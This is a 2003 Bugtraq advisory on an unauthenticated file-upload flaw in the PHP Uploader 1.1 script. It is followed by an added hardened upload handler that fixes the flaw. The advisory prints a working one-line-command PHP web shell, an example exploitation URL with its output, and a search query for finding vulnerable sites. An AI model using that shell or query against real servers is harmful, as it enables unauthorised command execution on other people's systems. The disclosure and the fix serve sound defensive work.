uploader.php vulnerability

From: kingcope@gmx.net
Date: 03/04/03

    Date: Tue, 4 Mar 2003 01:15:47 +0100 (MET)
    From: kingcope@gmx.net
    To: bugtraq@securityfocus.com
    
    

    Uploader Version 1.1, which is available from
    http://www.phpscriptcenter.com/uploader.php
    includes "uploader.php", which lets you upload ANY file (even scripts, e.g. in
    PHP) onto the server if no password protection is specified in the
    configuration file (default set to off).
    The supplied files will be uploaded into the directory "uploads" if not
    otherwise configured.

    So if we create a file like this:

    <?php
    $cmd = $_GET["cmd"];
    system("$cmd");
    ?>

    and upload it as "shellemul.php", we can execute commands by pointing our
    browser at
    http://www.victim.com/uploads/shellemul.php?cmd=id
    which will give us -->
    uid=48(apache) gid=48(apache) groups=48(apache)

    We could even upload PHPShell and have more comfortable fun.

    ---
    Google gets me 411 hits for "allinurl: uploader.php"
    ---
    by kcope (kingcope@gmx.net)

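Added example, not part of the original post and not Uploader's own code: an upload handler that closes the two gaps the advisory describes, uploads accepted without a password by default and a client-named file stored where the web server will execute it. The `UPLOAD_PW_HASH` environment variable, the `/var/uploader-data` path, the form field names and the extension allowlist are assumptions made for illustration.

```php
<?php
// Added example (not Uploader 1.1 code). Assumed names: UPLOAD_PW_HASH env var,
// /var/uploader-data storage path, form fields "password" and "file".
declare(strict_types=1);

const STORAGE_DIR = '/var/uploader-data';   // assumption: outside the web root
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'pdf' => 'application/pdf'];
const MAX_BYTES = 5 * 1024 * 1024;

function reject(int $status, string $msg): void
{
    http_response_code($status);
    exit($msg . "\n");
}

// 1. Fail closed: no configured password hash means uploads are disabled,
//    the opposite of the default the advisory reports.
$hash = getenv('UPLOAD_PW_HASH');           // value created with password_hash()
if ($hash === false || $hash === '') {
    reject(503, 'Uploads disabled: no password configured');
}
if (!password_verify((string)($_POST['password'] ?? ''), $hash)) {
    reject(403, 'Bad password');
}

// 2. Accept only a single, complete, size-bounded upload.
$f = $_FILES['file'] ?? null;
if (!is_array($f) || !is_int($f['error'] ?? null) || $f['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($f['tmp_name'])) {
    reject(400, 'Upload failed');
}
if ($f['size'] > MAX_BYTES) { reject(413, 'File too large'); }

// 3. Allowlist the extension and require the content type sniffed from the
//    bytes to match it; the client-supplied type is ignored.
$ext = strtolower(pathinfo((string)$f['name'], PATHINFO_EXTENSION));
$type = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
if (!isset(ALLOWED[$ext]) || ALLOWED[$ext] !== $type) {
    reject(415, 'File type not allowed');
}

// 4. Store under a server-generated name so the client never controls the
//    path or extension, in a directory the web server does not serve.
$dest = STORAGE_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($f['tmp_name'], $dest)) {
    reject(500, 'Could not store file');
}
chmod($dest, 0640);
echo "Stored\n";
```

If the files must stay under the document root, the web server should additionally be configured not to hand anything in that directory to the PHP interpreter.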